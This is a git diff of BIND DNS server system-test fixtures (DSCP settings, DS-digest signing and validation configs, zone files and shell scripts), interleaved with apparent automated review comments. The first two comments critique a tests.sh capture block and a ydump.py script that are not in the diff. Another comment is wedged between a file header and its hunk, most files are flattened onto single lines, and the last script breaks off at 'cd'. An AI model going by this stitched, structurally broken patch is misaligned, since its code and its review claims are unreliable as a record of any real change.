
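Review bot: In the second `if [ -n "$FSTRM_CAPTURE" ]` block of tests.sh, the "checking RESOLVER_RESPONSE message counts" check sets `ret=1` on a mismatch, but the next statement is the `ret=0` of the UPDATE_QUERY check, so a wrong `$rr4` is never reported and never added to `status`. Every other count check ends with `if [ $ret != 0 ]; then echo_i "failed"; fi` followed by ``status=`expr $status + $ret` ``; those two lines are missing after the `[ $rr4 -eq 0 ] || { … }` block both in the first unix-socket pass and in the reopened pass. Separately, `ret` is not reset before `grep "update failed: NOTAUTH"` at the top of that block, so a failure of the preceding hex-output check would be counted a second time; a `ret=0` before the `$DIG` call there fixes it.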
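Review bot: The `with subprocess.Popen(ARGS, stdout=subprocess.PIPE) as f:` block in ydump.py never looks at the exit status of dnstap-read, so a run that fails after printing nothing, or only some of the documents, still ends with exit code 0 and the YAML check in tests.sh passes. The process has been waited for once the `with` block exits, so the check is two lines placed after it: `if f.returncode != 0:` and `sys.exit(1)`. The `except (ModuleNotFoundError, ImportError)` tuple can also be reduced to `ImportError`, which already covers the former.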
diff --git a/bin/tests/system/dscp/clean.sh b/bin/tests/system/dscp/clean.sh
new file mode 100644
index 0000000..e52f7b6
--- /dev/null
+++ b/bin/tests/system/dscp/clean.sh
@@ -0,0 +1,20 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+rm -f */root.bk
+rm -f dig.out.10.53.0.?
+rm -f */named.memstats
+rm -f */named.run
+rm -f */named.conf
+rm -f ns*/named.lock
+rm -f ns*/managed-keys.bind*
diff --git a/bin/tests/system/dscp/ns1/named.args b/bin/tests/system/dscp/ns1/named.args
new file mode 100644
index 0000000..0c955c7
--- /dev/null
+++ b/bin/tests/system/dscp/ns1/named.args
@@ -0,0 +1 @@
+-m record,size,mctx -c named.conf -d 99 -D dscp-ns1 -X named.lock -g -U 4 -T maxcachesize=2097152 -T dscp=46
diff --git a/bin/tests/system/dscp/ns1/named.conf.in b/bin/tests/system/dscp/ns1/named.conf.in
new file mode 100644
index 0000000..e5c7971
--- /dev/null
+++ b/bin/tests/system/dscp/ns1/named.conf.in
@@ -0,0 +1,31 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + dscp 46; + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + recursion no; + dnssec-validation no; + notify yes; +}; + +zone "." { + type primary; + file "root.db"; +}; diff --git a/bin/tests/system/dscp/ns1/root.db b/bin/tests/system/dscp/ns1/root.db new file mode 100644 index 0000000..9d473e2 --- /dev/null +++ b/bin/tests/system/dscp/ns1/root.db @@ -0,0 +1,19 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 3600 +. SOA ns1.nil-servers. marka.isc.org. 1 3600 1200 3600000 1200 +. NS ns1.nil-servers. +. NS ns2.nil-servers. +ns1.nil-servers. A 10.53.0.1 +ns2.nil-servers. A 10.53.0.2 +xxx.example. A 10.53.0.1 +xxx.tld. A 10.53.0.1 diff --git a/bin/tests/system/dscp/ns2/named.args b/bin/tests/system/dscp/ns2/named.args new file mode 100644 index 0000000..ff501a8 --- /dev/null +++ b/bin/tests/system/dscp/ns2/named.args @@ -0,0 +1 @@ +-m record,size,mctx -c named.conf -d 99 -D dscp-ns2 -X named.lock -g -U 4 -T maxcachesize=2097152 -T dscp=46 
diff --git a/bin/tests/system/dscp/ns2/named.conf.in b/bin/tests/system/dscp/ns2/named.conf.in new file mode 100644 index 0000000..ca835c8 --- /dev/null +++ b/bin/tests/system/dscp/ns2/named.conf.in @@ -0,0 +1,32 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + dscp 46; + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion no; + dnssec-validation no; + notify yes; +}; + +zone "." { + type secondary; + file "root.bk"; + primaries { 10.53.0.1; }; +}; diff --git a/bin/tests/system/dscp/ns3/hint.db b/bin/tests/system/dscp/ns3/hint.db new file mode 100644 index 0000000..875a407 --- /dev/null +++ b/bin/tests/system/dscp/ns3/hint.db @@ -0,0 +1,16 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 3600 +. NS ns1.nil-servers. +. NS ns2.nil-servers. +ns1.nil-servers. A 10.53.0.1 +ns2.nil-servers. A 10.53.0.2 diff --git a/bin/tests/system/dscp/ns3/named.args b/bin/tests/system/dscp/ns3/named.args new file mode 100644 index 0000000..3d1981f --- /dev/null +++ b/bin/tests/system/dscp/ns3/named.args 
@@ -0,0 +1 @@ +-m record,size,mctx -c named.conf -d 99 -D dscp-ns3 -X named.lock -g -U 4 -T maxcachesize=2097152 -T dscp=46 diff --git a/bin/tests/system/dscp/ns3/named.conf.in b/bin/tests/system/dscp/ns3/named.conf.in new file mode 100644 index 0000000..38d4985 --- /dev/null +++ b/bin/tests/system/dscp/ns3/named.conf.in @@ -0,0 +1,31 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + dscp 46; + query-source address 10.53.0.3; + notify-source 10.53.0.3; + transfer-source 10.53.0.3; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.3; }; + listen-on-v6 { none; }; + notify yes; + recursion yes; + dnssec-validation yes; +}; + +zone "." { + type hint; + file "hint.db"; +}; diff --git a/bin/tests/system/dscp/ns4/named.args b/bin/tests/system/dscp/ns4/named.args new file mode 100644 index 0000000..277a47b --- /dev/null +++ b/bin/tests/system/dscp/ns4/named.args @@ -0,0 +1 @@ +-m record,size,mctx -c named.conf -d 99 -D dscp-ns4 -X named.lock -g -U 4 -T maxcachesize=2097152 -T dscp=46 diff --git a/bin/tests/system/dscp/ns4/named.conf.in b/bin/tests/system/dscp/ns4/named.conf.in new file mode 100644 index 0000000..8c8ca4f --- /dev/null +++ b/bin/tests/system/dscp/ns4/named.conf.in 
@@ -0,0 +1,31 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + dscp 47; + query-source dscp 46 address 10.53.0.4; + notify-source 10.53.0.4 dscp 46; + transfer-source 10.53.0.4 dscp 46; + port @PORT@; + pid-file "named.pid"; + listen-on dscp 46 { 10.53.0.4; }; + listen-on-v6 { none; }; + recursion no; + dnssec-validation no; + notify yes; +}; + +zone "." { + type primary; + file "root.db"; +}; diff --git a/bin/tests/system/dscp/ns4/root.db b/bin/tests/system/dscp/ns4/root.db new file mode 100644 index 0000000..cb3b395 --- /dev/null +++ b/bin/tests/system/dscp/ns4/root.db @@ -0,0 +1,19 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 3600 +. SOA ns4.nil-servers. marka.isc.org. 1 3600 1200 3600000 1200 +. NS ns4.nil-servers. +. NS ns5.nil-servers. +ns4.nil-servers. A 10.53.0.4 +ns5.nil-servers. A 10.53.0.5 +xxx.example. A 10.53.0.1 +xxx.tld. A 10.53.0.1 diff --git a/bin/tests/system/dscp/ns5/named.args b/bin/tests/system/dscp/ns5/named.args new file mode 100644 index 0000000..c678163 --- /dev/null +++ b/bin/tests/system/dscp/ns5/named.args @@ -0,0 +1 @@ +-m record,size,mctx -c named.conf -d 99 -D dscp-ns5 -X named.lock -g -U 4 -T maxcachesize=2097152 -T dscp=46 
diff --git a/bin/tests/system/dscp/ns5/named.conf.in b/bin/tests/system/dscp/ns5/named.conf.in new file mode 100644 index 0000000..2d1db3c --- /dev/null +++ b/bin/tests/system/dscp/ns5/named.conf.in @@ -0,0 +1,33 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + dscp 47; + query-source dscp 46 address 10.53.0.5; + notify-source 10.53.0.5 dscp 46; + transfer-source 10.53.0.5 dscp 46; + alt-transfer-source 10.53.0.5 dscp 46; + port @PORT@; + pid-file "named.pid"; + listen-on dscp 46 { 10.53.0.5; }; + listen-on-v6 { none; }; + recursion no; + dnssec-validation no; + notify yes; +}; + +zone "." { + type secondary; + file "root.bk"; + primaries { 10.53.0.4; }; +}; diff --git a/bin/tests/system/dscp/ns6/hint.db b/bin/tests/system/dscp/ns6/hint.db new file mode 100644 index 0000000..c2c51f2 --- /dev/null +++ b/bin/tests/system/dscp/ns6/hint.db @@ -0,0 +1,16 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 3600 +. NS ns4.nil-servers. +. NS ns5.nil-servers. +ns4.nil-servers. A 10.53.0.4 +ns5.nil-servers. A 10.53.0.5 diff --git a/bin/tests/system/dscp/ns6/named.args b/bin/tests/system/dscp/ns6/named.args new file mode 100644 index 0000000..283cf22 --- /dev/null 
+++ b/bin/tests/system/dscp/ns6/named.args @@ -0,0 +1 @@ +-m record,size,mctx -c named.conf -d 99 -D dscp-ns6 -X named.lock -g -U 4 -T maxcachesize=2097152 -T dscp=46 diff --git a/bin/tests/system/dscp/ns6/named.conf.in b/bin/tests/system/dscp/ns6/named.conf.in new file mode 100644 index 0000000..94c1b59 --- /dev/null +++ b/bin/tests/system/dscp/ns6/named.conf.in @@ -0,0 +1,31 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + dscp 47; + query-source dscp 46 address 10.53.0.6; + notify-source 10.53.0.6 dscp 46; + transfer-source 10.53.0.6 dscp 46; + port @PORT@; + pid-file "named.pid"; + listen-on dscp 46 { 10.53.0.6; }; + listen-on-v6 { none; }; + notify yes; + recursion yes; + dnssec-validation yes; +}; + +zone "." { + type hint; + file "hint.db"; +}; diff --git a/bin/tests/system/dscp/ns7/named.args b/bin/tests/system/dscp/ns7/named.args new file mode 100644 index 0000000..4ccf38e --- /dev/null +++ b/bin/tests/system/dscp/ns7/named.args @@ -0,0 +1 @@ +-m record,size,mctx -c named.conf -d 99 -D dscp-ns7 -X named.lock -g -U 4 -T maxcachesize=2097152 -T dscp=46 diff --git a/bin/tests/system/dscp/ns7/named.conf.in b/bin/tests/system/dscp/ns7/named.conf.in new file mode 100644 index 0000000..cbf7096 --- /dev/null +++ b/bin/tests/system/dscp/ns7/named.conf.in 
@@ -0,0 +1,36 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + dscp 47; + query-source dscp 46 address 10.53.0.7; + notify-source 10.53.0.7 dscp 47; + transfer-source 10.53.0.7 dscp 47; + alt-transfer-source 10.53.0.7 dscp 47; + port @PORT@; + pid-file "named.pid"; + listen-on dscp 46 { 10.53.0.7; }; + listen-on-v6 { none; }; + recursion no; + dnssec-validation no; + notify yes; +}; + +zone "." { + type secondary; + file "root.bk"; + transfer-source 10.53.0.7 dscp 46; + notify-source 10.53.0.7 dscp 46; + alt-transfer-source 10.53.0.7 dscp 46; + primaries { 10.53.0.4; }; +}; diff --git a/bin/tests/system/dscp/setup.sh b/bin/tests/system/dscp/setup.sh new file mode 100644 index 0000000..5cc2958 --- /dev/null +++ b/bin/tests/system/dscp/setup.sh @@ -0,0 +1,23 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +copy_setports ns1/named.conf.in ns1/named.conf +copy_setports ns2/named.conf.in ns2/named.conf +copy_setports ns3/named.conf.in ns3/named.conf +copy_setports ns4/named.conf.in ns4/named.conf +copy_setports ns5/named.conf.in ns5/named.conf +copy_setports ns6/named.conf.in ns6/named.conf +copy_setports ns7/named.conf.in ns7/named.conf 
diff --git a/bin/tests/system/dscp/tests.sh b/bin/tests/system/dscp/tests.sh new file mode 100644 index 0000000..d6b0824 --- /dev/null +++ b/bin/tests/system/dscp/tests.sh @@ -0,0 +1,42 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +DIGOPTS="+tcp +noadd +nosea +nostat +noquest -p ${PORT}" + +status=0 + +# +# 10.53.0.1 10.53.0.2 10.53.0.3 have a global dscp setting; +# 10.53.0.4 10.53.0.5 10.53.0.6 have dscp set in option *-source clauses; +# 10.53.0.7 has dscp set in zone *-source clauses; +# +for server in 10.53.0.1 10.53.0.2 10.53.0.3 10.53.0.4 10.53.0.5 \ + 10.53.0.6 10.53.0.7 +do + echo_i "testing root SOA lookup at $server" + for i in 0 1 2 3 4 5 6 7 8 9 + do + ret=0 + $DIG $DIGOPTS @$server soa . > dig.out.$server + grep "status: NOERROR" dig.out.$server > /dev/null || ret=1 + test $ret = 0 && break + sleep 1 + done + test $ret = 0 || { echo_i "failed"; status=`expr $status + $ret`; } +done + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/dsdigest/clean.sh b/bin/tests/system/dsdigest/clean.sh new file mode 100644 index 0000000..172cf1e --- /dev/null +++ b/bin/tests/system/dsdigest/clean.sh 
@@ -0,0 +1,24 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f supported +rm -f */K* */dsset-* */*.signed */trusted.conf +rm -f ns1/root.db +rm -f ns1/signer.err +rm -f ns2/good.db ns2/bad.db +rm -f dig.out* +rm -f */named.conf +rm -f */named.run +rm -f */named.memstats +rm -f ns*/named.lock +rm -f ns*/managed-keys.bind* diff --git a/bin/tests/system/dsdigest/ns1/named.conf.in b/bin/tests/system/dsdigest/ns1/named.conf.in new file mode 100644 index 0000000..da27c58 --- /dev/null +++ b/bin/tests/system/dsdigest/ns1/named.conf.in @@ -0,0 +1,36 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS1 + +controls { /* empty */ }; + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + recursion no; + notify yes; + dnssec-validation yes; +}; + +zone "." { + type primary; + file "root.db.signed"; +}; + +include "trusted.conf"; diff --git a/bin/tests/system/dsdigest/ns1/root.db.in b/bin/tests/system/dsdigest/ns1/root.db.in new file mode 100644 index 0000000..30c61e9 --- /dev/null +++ b/bin/tests/system/dsdigest/ns1/root.db.in 
@@ -0,0 +1,26 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +. IN SOA marka.isc.org. a.root.servers.nil. ( + 2012062000 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 600 ; minimum + ) +. NS a.root-servers.nil. +a.root-servers.nil. A 10.53.0.1 + +good. NS ns2.good. +ns2.good. A 10.53.0.2 +bad. NS ns2.bad. +ns2.bad. A 10.53.0.2 diff --git a/bin/tests/system/dsdigest/ns1/sign.sh b/bin/tests/system/dsdigest/ns1/sign.sh new file mode 100644 index 0000000..567d92f --- /dev/null +++ b/bin/tests/system/dsdigest/ns1/sign.sh @@ -0,0 +1,37 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=../.. +. $SYSTEMTESTTOP/conf.sh + +zone=. +infile=root.db.in +zonefile=root.db + +(cd ../ns2 && $SHELL sign.sh) + +cp ../ns2/dsset-good$TP . +cp ../ns2/dsset-bad$TP . + +key1=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone $zone) +key2=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone -f KSK $zone) + +cat $infile $key1.key $key2.key > $zonefile + +$SIGNER -P -g -o $zone $zonefile > /dev/null + +# Configure the resolving server with a static key. +keyfile_to_static_ds $key2 > trusted.conf +cp trusted.conf ../ns2/trusted.conf +cp trusted.conf ../ns3/trusted.conf +cp trusted.conf ../ns4/trusted.conf 
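Review bot: The SOA record in bin/tests/system/dsdigest/ns1/root.db.in reads `marka.isc.org. a.root.servers.nil.`, which puts what looks like the mailbox name in the MNAME position and spells the server name with a dot where the NS and A records below it use `a.root-servers.nil.` with a hyphen. The dscp root.db files in this same commit put the server name first (`ns1.nil-servers. marka.isc.org.`), so this looks like an unintended swap rather than a deliberate fixture. If no test depends on the current values, `. IN SOA a.root-servers.nil. marka.isc.org. (` would make the record consistent with the rest of the zone.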
diff --git a/bin/tests/system/dsdigest/ns2/bad.db.in b/bin/tests/system/dsdigest/ns2/bad.db.in new file mode 100644 index 0000000..c5e8c83 --- /dev/null +++ b/bin/tests/system/dsdigest/ns2/bad.db.in @@ -0,0 +1,23 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns2 +ns2 A 10.53.0.2 + +a A 10.0.0.1 diff --git a/bin/tests/system/dsdigest/ns2/good.db.in b/bin/tests/system/dsdigest/ns2/good.db.in new file mode 100644 index 0000000..c5e8c83 --- /dev/null +++ b/bin/tests/system/dsdigest/ns2/good.db.in @@ -0,0 +1,23 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns2 +ns2 A 10.53.0.2 + +a A 10.0.0.1 diff --git a/bin/tests/system/dsdigest/ns2/named.conf.in b/bin/tests/system/dsdigest/ns2/named.conf.in new file mode 100644 index 0000000..d3fd750 --- /dev/null +++ b/bin/tests/system/dsdigest/ns2/named.conf.in 
@@ -0,0 +1,46 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS2 + +controls { /* empty */ }; + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion no; + notify yes; + dnssec-validation yes; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +zone "good" { + type primary; + file "good.db.signed"; +}; + +zone "bad" { + type primary; + file "bad.db.signed"; +}; + +include "trusted.conf"; diff --git a/bin/tests/system/dsdigest/ns2/sign.sh b/bin/tests/system/dsdigest/ns2/sign.sh new file mode 100644 index 0000000..d86c717 --- /dev/null +++ b/bin/tests/system/dsdigest/ns2/sign.sh 
@@ -0,0 +1,44 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=../.. +. $SYSTEMTESTTOP/conf.sh + +zone1=good +infile1=good.db.in +zonefile1=good.db +zone2=bad +infile2=bad.db.in +zonefile2=bad.db + +keyname11=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone $zone1) +keyname12=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone -f KSK $zone1) +keyname21=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone $zone2) +keyname22=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone -f KSK $zone2) + +cat $infile1 $keyname11.key $keyname12.key >$zonefile1 +cat $infile2 $keyname21.key $keyname22.key >$zonefile2 + +$SIGNER -P -g -o $zone1 $zonefile1 > /dev/null +$SIGNER -P -g -o $zone2 $zonefile2 > /dev/null + +DSFILENAME1=dsset-${zone1}${TP} +DSFILENAME2=dsset-${zone2}${TP} +$DSFROMKEY -a SHA-256 $keyname12 > $DSFILENAME1 +$DSFROMKEY -a SHA-256 $keyname22 > $DSFILENAME2 + +algo=SHA-384 + +$DSFROMKEY -a $algo $keyname12 >> $DSFILENAME1 +$DSFROMKEY -a $algo $keyname22 > $DSFILENAME2 + diff --git a/bin/tests/system/dsdigest/ns3/named.conf.in b/bin/tests/system/dsdigest/ns3/named.conf.in new file mode 100644 index 0000000..a2b105c --- /dev/null +++ b/bin/tests/system/dsdigest/ns3/named.conf.in 
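Review bot: The last command in bin/tests/system/dsdigest/ns2/sign.sh writes the SHA-384 DS for the bad zone with `>` while the good zone uses `>>`, so the SHA-256 DS written to `$DSFILENAME2` a few lines earlier is discarded, and nothing says this is intended. It appears deliberate, because the ns3 and ns4 configs list SHA-384 in `disable-ds-digests`, which leaves the bad zone with only a disabled digest type; as written it reads like a typo. A comment above the line such as `# bad: overwrite (not append) so only the disabled SHA-384 DS remains` would protect it from a well-meant "fix". The earlier `$DSFROMKEY -a SHA-256 $keyname22 > $DSFILENAME2` line could then be dropped as dead.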
@@ -0,0 +1,39 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS3 + +controls { /* empty */ }; + +options { + query-source address 10.53.0.3; + notify-source 10.53.0.3; + transfer-source 10.53.0.3; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.3; }; + listen-on-v6 { none; }; + recursion yes; + dnssec-validation yes; + dnssec-must-be-secure . yes; + /* only SHA-256 is enabled */ + disable-ds-digests . { SHA-1; SHA-384; 5; 6; 7; 8; 9; }; + +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +include "trusted.conf"; diff --git a/bin/tests/system/dsdigest/ns4/named.conf.in b/bin/tests/system/dsdigest/ns4/named.conf.in new file mode 100644 index 0000000..e43763b --- /dev/null +++ b/bin/tests/system/dsdigest/ns4/named.conf.in 
@@ -0,0 +1,37 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS3 + +controls { /* empty */ }; + +options { + query-source address 10.53.0.4; + notify-source 10.53.0.4; + transfer-source 10.53.0.4; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.4; }; + listen-on-v6 { none; }; + recursion yes; + dnssec-validation yes; + /* only SHA-256 is enabled */ + disable-ds-digests . { SHA-1; SHA-384; 5; 6; 7; 8; 9; }; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +include "trusted.conf"; diff --git a/bin/tests/system/dsdigest/setup.sh b/bin/tests/system/dsdigest/setup.sh new file mode 100644 index 0000000..eddbf6b --- /dev/null +++ b/bin/tests/system/dsdigest/setup.sh @@ -0,0 +1,22 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +copy_setports ns1/named.conf.in ns1/named.conf +copy_setports ns2/named.conf.in ns2/named.conf +copy_setports ns3/named.conf.in ns3/named.conf +copy_setports ns4/named.conf.in ns4/named.conf + +cd 